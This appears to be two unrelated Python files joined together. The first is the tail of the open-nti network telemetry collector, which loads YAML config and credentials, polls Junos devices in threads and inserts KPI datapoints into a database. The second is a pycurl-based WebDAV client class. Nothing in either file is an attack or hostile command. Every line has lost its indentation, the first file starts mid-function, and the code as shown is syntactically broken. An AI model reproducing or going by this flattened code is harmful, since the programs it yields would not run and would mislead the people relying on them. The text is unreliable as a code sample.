## Based on parameter defined in config file
if use_hostname:
hostname_xpth = "//host-name"
hostname_tmp = xml_data.xpath(hostname_xpth)[0].text.strip()
hostname = convert_variable_type(hostname_tmp)
logger.info('[%s]: Host will now be referenced as : %s', host, hostname)
host = hostname
# if (db_schema == 1):
# latest_datapoints = get_latest_datapoints(host=host)
# logger.info("Latest Datapoints are:")
# logger.info(pformat(latest_datapoints))
#latest_datapoints = get_latest_datapoints(host=host)
#logger.debug("Latest Datapoints are:")
#logger.debug(pformat(latest_datapoints))
else:
logger.info('[%s]: Host will be referenced as : %s', host, host)
kpi_tags['device']=host
kpi_tags['kpi']="base-info"
match={}
match["variable-name"]="base-info"
# We'll add a dummy kpi in oder to have at least one fixed kpi with version/platform data.
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
# Now we have all hosts tags that all host kpis will inherit
# For each target_command execute it, parse it, and insert values into DB
timestamp_tracking['collector_cli_start'] = int(datetime.today().strftime('%s'))
for target_command in target_commands:
logger.info('[%s]: Executing command: %s', host, target_command)
# Execute rpc/command on host and get result
result = execute_command(jdev,target_command)
if result:
logger.debug('[%s]: Parsing command: %s', host, target_command)
#parse_result(host,target_command,result,datapoints,latest_datapoints,kpi_tags)
parse_result(host,target_command,result,datapoints,kpi_tags)
time.sleep(delay_between_commands)
try:
jdev.close()
time.sleep(0.5)
except Exception, e:
print "ERROR: Something wrong happens when closing the connection with the device"
logging.exception(e)
timestamp_tracking['collector_cli_ends'] = int(datetime.today().strftime('%s'))
logger.info('[%s]: timestamp_tracking - CLI collection %s', host, timestamp_tracking['collector_cli_ends']-timestamp_tracking['collector_cli_start'])
timestamp_tracking['collector_ends'] = int(datetime.today().strftime('%s'))
# Add open-nti internal kpi
collection_time = timestamp_tracking['collector_ends']-timestamp_tracking['collector_start']
#kpi_tags['device']=host
kpi_tags['stats']="collection-time"
match={}
match["variable-name"]="open-nti-stats"
value_tmp =collection_time
# We'll add a dummy kpi in oder to have at least one fixed kpi with version/platform data.
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
#kpi_tags['device']=host
kpi_tags['stats']="collection-successful"
match={}
match["variable-name"]="open-nti-stats"
value_tmp = 1
# We'll add a dummy kpi in oder to have at least one fixed kpi with version/platform data.
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
if datapoints: # Only insert datapoints if there is any :)
insert_datapoints(datapoints)
logger.info('[%s]: timestamp_tracking - total collection %s', host, collection_time)
else:
logger.error('[%s]: Skipping host due connectivity issue', host)
datapoints = []
#latest_datapoints = get_latest_datapoints(host=host)
# By default execute show version in order to get version and platform as default tags for all kpi related to this host
kpi_tags['device']=host
kpi_tags['stats']="collection-failure"
match={}
match["variable-name"]="open-nti-stats"
value_tmp = 1
# We'll add a dummy kpi in oder to have at least one fixed kpi with version/platform data.
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
if datapoints: # Only insert datapoints if there is any :)
insert_datapoints(datapoints)
################################################################################################
################################################################################################
################################################################################################
# SCRIPT STARTS HERE
################################################################################################
# Create and Parse Arguments
################################################################################################
if getattr(sys, 'frozen', False):
# frozen
BASE_DIR = os.path.dirname(sys.executable)
else:
# unfrozen
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
BASE_DIR_INPUT = BASE_DIR + "/data/"
full_parser = argparse.ArgumentParser()
full_parser.add_argument("--tag", nargs='+', help="Collect data from hosts that matches the tag")
full_parser.add_argument("-c", "--console", action='store_true', help="Console logs enabled")
full_parser.add_argument("-t", "--test", action='store_true', help="Use emulated Junos device")
full_parser.add_argument("-s", "--start", action='store_true', help="Start collecting (default 'no')")
full_parser.add_argument("-i", "--input", default= BASE_DIR_INPUT, help="Directory where to find input files")
dynamic_args = vars(full_parser.parse_args())
## Change BASE_DIR_INPUT if we are in "test" mode
if dynamic_args['test']:
BASE_DIR_INPUT = dynamic_args['input']
################################################################################################
# Loading YAML Default Variables
###############################################################################################
default_variables_yaml_file = BASE_DIR_INPUT + "open-nti.variables.yaml"
default_variables = {}
try:
with open(default_variables_yaml_file) as f:
default_variables = yaml.load(f)
except Exception, e:
logger.info('Error importing default variables file": %s', default_variables_yaml_file)
logging.exception(e)
sys.exit(0)
db_schema = default_variables['db_schema']
db_server = default_variables['db_server']
db_port = default_variables['db_port']
db_name = default_variables['db_name']
db_admin = default_variables['db_admin']
db_admin_password = default_variables['db_admin_password']
db_user = default_variables['db_user']
db_user_password = default_variables['db_user_password']
max_connection_retries = default_variables['max_connection_retries']
max_collector_threads = default_variables['max_collector_threads']
delay_between_commands = default_variables['delay_between_commands']
logging_level = default_variables['logging_level']
default_junos_rpc_timeout = default_variables['default_junos_rpc_timeout']
use_hostname = default_variables['use_hostname']
################################################################################################
# Validate Arguments
###############################################################################################
tag_list = []
### Known and fixed arguments
if dynamic_args['tag']:
tag_list = dynamic_args['tag']
else:
tag_list = [ ".*" ]
if not(dynamic_args['start']):
logger.error('Missing <start> option, so nothing to do')
sys.exit(0)
################################################################################################
# open-nti starts here start
################################################################################################
# Setting up logging directories and files
timestamp = time.strftime("%Y-%m-%d", time.localtime(time.time()))
log_dir = BASE_DIR + "/" + default_variables['log_dir']
logger = logging.getLogger("_open-nti_")
if not os.path.exists(log_dir):
os.makedirs(log_dir, 0755)
formatter = '%(asctime)s %(name)s %(levelname)s %(threadName)-10s: %(message)s'
logging.basicConfig(filename=log_dir + "/"+ timestamp + '_open-nti.log',level=logging_level,format=formatter, datefmt='%Y-%m-%d %H:%M:%S')
if dynamic_args['console']:
logger.info("Console logs enabled")
console = logging.StreamHandler()
console.setLevel (logging.DEBUG)
logging.getLogger('').addHandler(console)
###############
# LOAD all credentials in a dict
credentials_yaml_file = BASE_DIR_INPUT + default_variables['credentials_file']
credentials = {}
logger.debug('Importing credentials file: %s ',credentials_yaml_file)
try:
with open(credentials_yaml_file) as f:
credentials = yaml.load(f)
except Exception, e:
logger.error('Error importing credentials file: %s', credentials_yaml_file)
# logging.exception(e)
sys.exit(0)
# LOAD all hosts with their tags in a dic
hosts_yaml_file = BASE_DIR_INPUT + default_variables['hosts_file']
hosts = {}
logger.debug('Importing host file: %s ',hosts_yaml_file)
try:
with open(hosts_yaml_file) as f:
hosts = yaml.load(f)
except Exception, e:
logger.error('Error importing host file: %s', hosts_yaml_file)
#logging.exception(e)
sys.exit(0)
# LOAD all commands with their tags in a dict
commands_yaml_file = BASE_DIR_INPUT + default_variables['commands_file']
commands = []
logger.debug('Importing commands file: %s ',commands_yaml_file)
with open(commands_yaml_file) as f:
try:
for document in yaml.load_all(f):
commands.append(document)
except Exception, e:
logger.error('Error importing commands file: %s', commands_yaml_file)
# logging.exception(e)
sys.exit(0)
general_commands = commands[0]
# LOAD all parsers
junos_parsers = []
junos_parsers_yaml_files = os.listdir(BASE_DIR + "/" + default_variables['junos_parsers_dir'])
logger.debug('Importing junos parsers file: %s ',junos_parsers_yaml_files)
for junos_parsers_yaml_file in junos_parsers_yaml_files:
try:
with open(BASE_DIR + "/" + default_variables['junos_parsers_dir'] + "/" + junos_parsers_yaml_file) as f:
junos_parsers.append(yaml.load(f))
except Exception, e:
logger.error('Error importing junos parser: %s', junos_parsers_yaml_file)
# logging.exception(e)
pass
pfe_parsers = []
pfe_parsers_yaml_files = os.listdir(BASE_DIR + "/" + default_variables['pfe_parsers_dir'])
logger.debug('Importing pfe parsers file: %s ',pfe_parsers_yaml_files)
for pfe_parsers_yaml_file in pfe_parsers_yaml_files:
try:
with open(BASE_DIR + "/" + default_variables['pfe_parsers_dir'] + "/" + pfe_parsers_yaml_file) as f:
pfe_parsers.append(yaml.load(f))
except Exception, e:
logger.error('Error importing pfe parser: %s', pfe_parsers_yaml_file)
# logging.exception(e)
pass
if __name__ == "__main__":
logger.debug('Getting hosts that matches the specified tags')
# Get all hosts that matches with the tags
target_hosts = get_target_hosts()
logger.debug('The following hosts are being selected: %s', target_hosts)
# Test DB connectivity before starting to collect data
if check_db_status():
# Create a list of jobs and then iterate through
# the number of threads appending each thread to
# the job list
target_hosts_lists = [target_hosts[x:x+len(target_hosts)/max_collector_threads+1] for x in range(0, len(target_hosts), len(target_hosts)/max_collector_threads+1)]
jobs = []
i=1
for target_hosts_list in target_hosts_lists:
logger.info('Collector Thread-%s scheduled with following hosts: %s', i, target_hosts_list)
thread = threading.Thread(target=collector, kwargs={"host_list":target_hosts_list})
jobs.append(thread)
i=i+1
# Start the threads
for j in jobs:
j.start()
# Ensure all of the threads have finished
for j in jobs:
j.join()
|
client.py
|
# -*- coding: utf-8
import pycurl
import os
import shutil
import threading
import lxml.etree as etree
from io import BytesIO
from re import sub
from webdav.connection import *
from webdav.exceptions import *
from webdav.urn import Urn
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
__version__ = "1.0.10-carlos"
def listdir(directory):
file_names = list()
for filename in os.listdir(directory):
file_path = os.path.join(directory, filename)
if os.path.isdir(file_path):
filename = "{filename}{separate}".format(filename=filename, separate=os.path.sep)
file_names.append(filename)
return file_names
def add_options(request, options):
for (key, value) in options.items():
if value is None:
continue
try:
request.setopt(pycurl.__dict__[key], value)
except TypeError:
raise OptionNotValid(key, value)
except pycurl.error as e:
raise OptionNotValid(key, value)
def get_options(type, from_options):
_options = dict()
for key in type.keys:
key_with_prefix = "{prefix}{key}".format(prefix=type.prefix, key=key)
if key not in from_options and key_with_prefix not in from_options:
_options[key] = ""
elif key in from_options:
_options[key] = from_options.get(key)
else:
_options[key] = from_options.get(key_with_prefix)
return _options
class Client(object):
root = '/'
large_size = 2 * 1024 * 1024 * 1024
http_header = {
'list': ["Accept: */*", "Depth: 1"],
'free': ["Accept: */*", "Depth: 0", "Content-Type: text/xml"],
'copy': ["Accept: */*"],
'move': ["Accept: */*"],
'mkdir': ["Accept: */*", "Connection: Keep-Alive"],
'clean': ["Accept: */*", "Connection: Keep-Alive"],
'check': ["Accept: */*"],
'info': ["Accept: */*", "Depth: 1"],
'get_metadata': ["Accept: */*", "Depth: 1", "Content-Type: application/x-www-form-urlencoded"],
'set_metadata': ["Accept: */*", "Depth: 1", "Content-Type: application/x-www-form-urlencoded"]
}
def get_header(self, method):
if method in Client.http_header:
try:
header = Client.http_header[method].copy()
except AttributeError:
header = Client.http_header[method][:]
else:
header = list()
if self.webdav.token:
webdav_token = "Authorization: OAuth {token}".format(token=self.webdav.token)
header.append(webdav_token)
return header
requests = {
'copy': "COPY",
'move': "MOVE",
'mkdir': "MKCOL",
'clean': "DELETE",
'check': "HEAD",
'list': "PROPFIND",
'free': "PROPFIND",
'info': "PROPFIND",
'publish': "PROPPATCH",
'unpublish': "PROPPATCH",
'published': "PROPPATCH",
'get_metadata': "PROPFIND",
'set_metadata': "PROPPATCH"
}
meta_xmlns = {
'https://webdav.yandex.ru': "urn:yandex:disk:meta",
}
def __init__(self, options):
webdav_options = get_options(type=WebDAVSettings, from_options=options)
proxy_options = get_options(type=ProxySettings, from_options=options)
self.webdav = WebDAVSettings(webdav_options)
self.proxy = ProxySettings(proxy_options)
# ver __del__
# se inicializa automaticamente la primera vez que usa libcurl
# ver https://curl.haxx.se/libcurl/c/libcurl.html#GLOBAL
#pycurl.global_init(pycurl.GLOBAL_DEFAULT)
self.default_options = {}
def __del__(self):
# Comento cleanup porque me trae problemas con la libreria gcloud de google
# Tira exception ssl.SSLError: ('failed to allocate SSL context',) cuando create un
# nuevo context
# ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
# File "/usr/lib/python2.7/ssl.py", line 411, in create_default_context
# context = SSLContext(PROTOCOL_SSLv23)
# File "/usr/lib/python2.7/ssl.py", line 337, in __new__
# self = _SSLContext.__new__(cls, protocol)
# ssl.SSLError: ('failed to allocate SSL context',)
#pycurl.global_cleanup()
pass
def valid(self):
return True if self.webdav.valid() and self.proxy.valid() else False
def Request(self, options=None):
curl = pycurl.Curl()
self.default_options.update({
'URL': self.webdav.hostname,
'NOBODY': 1,
'SSLVERSION': pycurl.SSLVERSION_TLSv1,
})
if not self.webdav.token:
server_token = '{login}:{password}'.format(login=self.webdav.login, password=self.webdav.password)
self.default_options.update({
'USERPWD': server_token,
})
if self.proxy.valid():
if self.proxy.hostname:
self.default_options['PROXY'] = self.proxy.hostname
if self.proxy.login:
if not self.proxy.password:
self.default_options['PROXYUSERNAME'] = self.proxy.login
else:
proxy_token = '{login}:{password}'.format(login=self.proxy.login, password=self.proxy.password)
self.default_options['PROXYUSERPWD'] = proxy_token
if self.webdav.cert_path:
self.default_options['SSLCERT'] = self.webdav.cert_path
if self.webdav.key_path:
self.default_options['SSLKEY'] = self.webdav.key_path
if self.webdav.recv_speed:
self.default_options['MAX_RECV_SPEED_LARGE'] = self.webdav.recv_speed
if self.webdav.send_speed:
self.default_options['MAX_SEND_SPEED_LARGE'] = self.webdav.send_speed
if self.webdav.verbose:
self.default_options['VERBOSE'] = self.webdav.verbose
if self.webdav.conn_timeout:
self.default_options['CONNECTTIMEOUT_MS'] = self.webdav.conn_timeout
if self.default_options:
add_options(curl, self.default_options)
if options:
add_options(curl, options)
return curl
def list(self, remote_path=root):
def parse(response):
try:
response_str = response.getvalue()
tree = etree.fromstring(response_str)
hrees = [unquote(hree.text) for hree in tree.findall(".//{DAV:}href")]
return [Urn(hree) for hree in hrees]
except etree.XMLSyntaxError:
return list()
try:
directory_urn = Urn(remote_path, directory=True)
if directory_urn.path() != Client.root:
if not self.check(directory_urn.path()):
raise RemoteResourceNotFound(directory_urn.path())
response = BytesIO()
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': directory_urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['list'],
'HTTPHEADER': self.get_header('list'),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
urns = parse(response)
path = "{root}{path}".format(root=self.webdav.root, path=directory_urn.path())
return [urn.filename() for urn in urns if urn.path() != path and urn.path() != path[:-1]]
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def free(self):
def parse(response):
try:
response_str = response.getvalue()
tree = etree.fromstring(response_str)
node = tree.find('.//{DAV:}quota-available-bytes')
if node is not None:
return int(node.text)
else:
raise MethodNotSupported(name='free', server=self.webdav.hostname)
except TypeError:
raise MethodNotSupported(name='free', server=self.webdav.hostname)
except etree.XMLSyntaxError:
return str()
def data():
root = etree.Element("propfind", xmlns="DAV:")
prop = etree.SubElement(root, "prop")
etree.SubElement(prop, "quota-available-bytes")
etree.SubElement(prop, "quota-used-bytes")
tree = etree.ElementTree(root)
buff = BytesIO()
tree.write(buff)
return buff.getvalue()
try:
response = BytesIO()
options = {
'CUSTOMREQUEST': Client.requests['free'],
'HTTPHEADER': self.get_header('free'),
'POSTFIELDS': data(),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
return parse(response)
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def check(self, remote_path=root):
try:
urn = Urn(remote_path)
response = BytesIO()
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['check'],
'HTTPHEADER': self.get_header('check'),
'WRITEDATA': response,
'NOBODY': 1
}
request = self.Request(options=options)
request.perform()
code = request.getinfo(pycurl.HTTP_CODE)
request.close()
if int(code) == 200:
return True
return False
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def mkdir(self, remote_path):
try:
directory_urn = Urn(remote_path, directory=True)
if not self.check(directory_urn.parent()):
raise RemoteParentNotFound(directory_urn.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': directory_urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['mkdir'],
'HTTPHEADER': self.get_header('mkdir')
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def download_to(self, buff, remote_path):
try:
urn = Urn(remote_path)
if self.is_dir(urn.path()):
raise OptionNotValid(name="remote_path", value=remote_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'WRITEFUNCTION': buff.write,
'HTTPHEADER': self.get_header('download_to'),
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def download(self, remote_path, local_path, progress=None):
urn = Urn(remote_path)
if self.is_dir(urn.path()):
self.download_directory(local_path=local_path, remote_path=remote_path, progress=progress)
else:
self.download_file(local_path=local_path, remote_path=remote_path, progress=progress)
def download_directory(self, remote_path, local_path, progress=None):
urn = Urn(remote_path, directory=True)
if not self.is_dir(urn.path()):
raise OptionNotValid(name="remote_path", value=remote_path)
if os.path.exists(local_path):
shutil.rmtree(local_path)
os.makedirs(local_path)
for resource_name in self.list(urn.path()):
_remote_path = "{parent}{name}".format(parent=urn.path(), name=resource_name)
_local_path = os.path.join(local_path, resource_name)
self.download(local_path=_local_path, remote_path=_remote_path, progress=progress)
def download_file(self, remote_path, local_path, progress=None):
try:
urn = Urn(remote_path)
if os.path.isdir(local_path):
raise OptionNotValid(name="local_path", value=local_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
with open(local_path, 'wb') as local_file:
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'HTTPHEADER': self.get_header('download_file'),
'WRITEDATA': local_file,
'NOPROGRESS': 0 if progress else 1,
'NOBODY': 0
}
if progress:
options["PROGRESSFUNCTION"] = progress
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def download_sync(self, remote_path, local_path, callback=None):
self.download(local_path=local_path, remote_path=remote_path)
if callback:
callback()
def download_async(self, remote_path, local_path, callback=None):
target = (lambda: self.download_sync(local_path=local_path, remote_path=remote_path, callback=callback))
threading.Thread(target=target).start()
def upload_from(self, buff, remote_path):
try:
urn = Urn(remote_path)
if urn.is_dir():
raise OptionNotValid(name="remote_path", value=remote_path)
if not self.check(urn.parent()):
raise RemoteParentNotFound(urn.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'HTTPHEADER': self.get_header('upload_from'),
'UPLOAD': 1,
'READFUNCTION': buff.read,
}
request = self.Request(options=options)
request.perform()
code = int(request.getinfo(pycurl.HTTP_CODE))
if code == 507:
raise NotEnoughSpace()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def upload(self, remote_path, local_path, progress=None):
if os.path.isdir(local_path):
self.upload_directory(local_path=local_path, remote_path=remote_path, progress=progress)
else:
self.upload_file(local_path=local_path, remote_path=remote_path, progress=progress)
def upload_directory(self, remote_path, local_path, progress=None):
urn = Urn(remote_path, directory=True)
if not urn.is_dir():
raise OptionNotValid(name="remote_path", value=remote_path)
if not os.path.isdir(local_path):
raise OptionNotValid(name="local_path", value=local_path)
if not os.path.exists(local_path):
raise LocalResourceNotFound(local_path)
if self.check(urn.path()):
self.clean(urn.path())
self.mkdir(remote_path)
for resource_name in listdir(local_path):
_remote_path = "{parent}{name}".format(parent=urn.path(), name=resource_name)
_local_path = os.path.join(local_path, resource_name)
self.upload(local_path=_local_path, remote_path=_remote_path, progress=progress)
def upload_file(self, remote_path, local_path, progress=None):
try:
if not os.path.exists(local_path):
raise LocalResourceNotFound(local_path)
urn = Urn(remote_path)
if urn.is_dir():
raise OptionNotValid(name="remote_path", value=remote_path)
if os.path.isdir(local_path):
raise OptionNotValid(name="local_path", value=local_path)
if not self.check(urn.parent()):
raise RemoteParentNotFound(urn.path())
with open(local_path, "rb") as local_file:
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'HTTPHEADER': self.get_header('upload_file'),
'UPLOAD': 1,
'READFUNCTION': local_file.read,
'NOPROGRESS': 0 if progress else 1
}
if progress:
options["PROGRESSFUNCTION"] = progress
file_size = os.path.getsize(local_path)
if file_size > self.large_size:
options['INFILESIZE_LARGE'] = file_size
else:
options['INFILESIZE'] = file_size
request = self.Request(options=options)
request.perform()
code = int(request.getinfo(pycurl.HTTP_CODE))
if code == 507:
raise NotEnoughSpace()
if code == 500:
raise InternalServerError()
if code < 200 or code >=400:
raise UnhandledError()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def upload_sync(self, remote_path, local_path, callback=None):
self.upload(local_path=local_path, remote_path=remote_path)
if callback:
callback()
def upload_async(self, remote_path, local_path, callback=None):
target = (lambda: self.upload_sync(local_path=local_path, remote_path=remote_path, callback=callback))
threading.Thread(target=target).start()
def copy(self, remote_path_from, remote_path_to):
def header(remote_path_to):
path = Urn(remote_path_to).path()
destination = "{root}{path}".format(root=self.webdav.root, path=path)
header_item = "Destination: {destination}".format(destination=destination)
header = self.get_header('copy')
header.append(header_item)
return header
try:
urn_from = Urn(remote_path_from)
if not self.check(urn_from.path()):
raise RemoteResourceNotFound(urn_from.path())
urn_to = Urn(remote_path_to)
if not self.check(urn_to.parent()):
raise RemoteParentNotFound(urn_to.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn_from.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['copy'],
'HTTPHEADER': header(remote_path_to)
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def move(self, remote_path_from, remote_path_to):
def header(remote_path_to):
path = Urn(remote_path_to).path()
destination = "{root}{path}".format(root=self.webdav.root, path=path)
header_item = "Destination: {destination}".format(destination=destination)
header = self.get_header('move')
header.append(header_item)
return header
try:
urn_from = Urn(remote_path_from)
if not self.check(urn_from.path()):
raise RemoteResourceNotFound(urn_from.path())
urn_to = Urn(remote_path_to)
if not self.check(urn_to.parent()):
raise RemoteParentNotFound(urn_to.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn_from.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['move'],
'HTTPHEADER': header(remote_path_to)
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def clean(self, remote_path):
try:
urn = Urn(remote_path)
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['clean'],
'HTTPHEADER': self.get_header('clean')
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def publish(self, remote_path):
def parse(response):
try:
response_str = response.getvalue()
tree = etree.fromstring(response_str)
result = tree.xpath("//*[local-name() = 'public_url']")
public_url = result[0]
return public_url.text
except IndexError:
raise MethodNotSupported(name="publish", server=self.webdav.hostname)
except etree.XMLSyntaxError:
return ""
def data(for_server):
root_node = etree.Element("propertyupdate", xmlns="DAV:")
set_node = etree.SubElement(root_node, "set")
prop_node = etree.SubElement(set_node, "prop")
xmlns = Client.meta_xmlns.get(for_server, "")
public_url = etree.SubElement(prop_node, "public_url", xmlns=xmlns)
public_url.text = "true"
tree = etree.ElementTree(root_node)
buff = BytesIO()
tree.write(buff)
return buff.getvalue()
try:
urn = Urn(remote_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
response = BytesIO()
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['publish'],
'HTTPHEADER': self.get_header('publish'),
'POSTFIELDS': data(for_server=self.webdav.hostname),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
return parse(response)
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def unpublish(self, remote_path):
def data(for_server):
root = etree.Element("propertyupdate", xmlns="DAV:")
remove = etree.SubElement(root, "remove")
prop = etree.SubElement(remove, "prop")
xmlns = Client.meta_xmlns.get(for_server, "")
etree.SubElement(prop, "public_url", xmlns=xmlns)
tree = etree.ElementTree(root)
buff = BytesIO()
tree.write(buff)
return buff.getvalue()
try:
urn = Urn(remote_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['unpublish'],
'HTTPHEADER': self.get_header('unpublish'),
'POSTFIELDS': data(for_server=self.webdav.hostname)
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def info(self, remote_path):
def parse(response, path):
try:
response_str = response.getvalue()
tree = etree.fromstring(response_str)
find_attributes = {
'created': ".//{DAV:}creationdate",
'name': ".//{DAV:}displayname",
'size': ".//{DAV:}getcontentlength",
'modified': ".//{DAV:}getlastmodified"
}
resps = tree.findall("{DAV:}response")
for resp in resps:
href = resp.findtext("{DAV:}href")
urn = unquote(href)
if path[-1] == Urn.separate:
if not path == urn:
continue
else:
path_with_sep = "{path}{sep}".format(path=path, sep=Urn.separate)
if not path == urn and not path_with_sep == urn:
continue
info = dict()
for (name, value) in find_attributes.items():
info[name] = resp.findtext(value)
return info
raise RemoteResourceNotFound(path)
except etree.XMLSyntaxError:
raise MethodNotSupported(name="info", server=self.webdav.hostname)
try:
urn = Urn(remote_path)
response = BytesIO()
if not self.check(urn.path()) and not self.check(Urn(remote_path, directory=True).path()):
raise RemoteResourceNotFound(remote_path)
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['info'],
'HTTPHEADER': self.get_header('info'),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
path = "{root}{path}".format(root=self.webdav.root, path=urn.path())
return parse(response, path)
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def is_dir(self, remote_path):
def parse(response, path):
try:
response_str = response.getvalue()
tree = etree.fromstring(response_str)
resps = tree.findall("{DAV:}response")
for resp in resps:
href = resp.findtext("{DAV:}href")
urn = unquote(href)
if path[-1] == Urn.separate:
if not path == urn:
continue
else:
path_with_sep = "{path}{sep}".format(path=path, sep=Urn.separate)
if not path == urn and not path_with_sep == urn:
continue
type = resp.find(".//{DAV:}resourcetype")
if type is None:
raise MethodNotSupported(name="is_dir", server=self.webdav.hostname)
dir_type = type.find("{DAV:}collection")
return True if dir_type is not None else False
raise RemoteResourceNotFound(path)
except etree.XMLSyntaxError:
raise MethodNotSupported(name="is_dir", server=self.webdav.hostname)
try:
urn = Urn(remote_path)
parent_urn = Urn(urn.parent())
if not self.check(urn.path()) and not self.check(Urn(remote_path, directory=True).path()):
raise RemoteResourceNotFound(remote_path)
response = BytesIO()
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': parent_urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['info'],
'HTTPHEADER': self.get_header('info'),
'WRITEDATA': response,
'NOBODY': 0
}
request = self.Request(options=options)
request.perform()
request.close()
path = "{root}{path}".format(root=self.webdav.root, path=urn.path())
return parse(response, path)
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def resource(self, remote_path):
urn = Urn(remote_path)
return Resource(self, urn.path())
def get_property(self, remote_path, option):
def parse(response, option):
response_str = response.getvalue()
tree = etree.fromstring(response_str)
xpath = "{xpath_prefix}{xpath_exp}".format(xpath_prefix=".//", xpath_exp=option['name'])
return tree.findtext(xpath)
def data(option):
root = etree.Element("propfind", xmlns="DAV:")
prop = etree.SubElement(root, "prop")
etree.SubElement(prop, option.get('name', ""), xmlns=option.get('namespace', ""))
tree = etree.ElementTree(root)
buff = BytesIO()
tree.write(buff)
return buff.getvalue()
try:
urn = Urn(remote_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
response = BytesIO()
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['get_metadata'],
'HTTPHEADER': self.get_header('get_metadata'),
'POSTFIELDS': data(option),
'WRITEDATA': response,
'NOBODY': 0
}
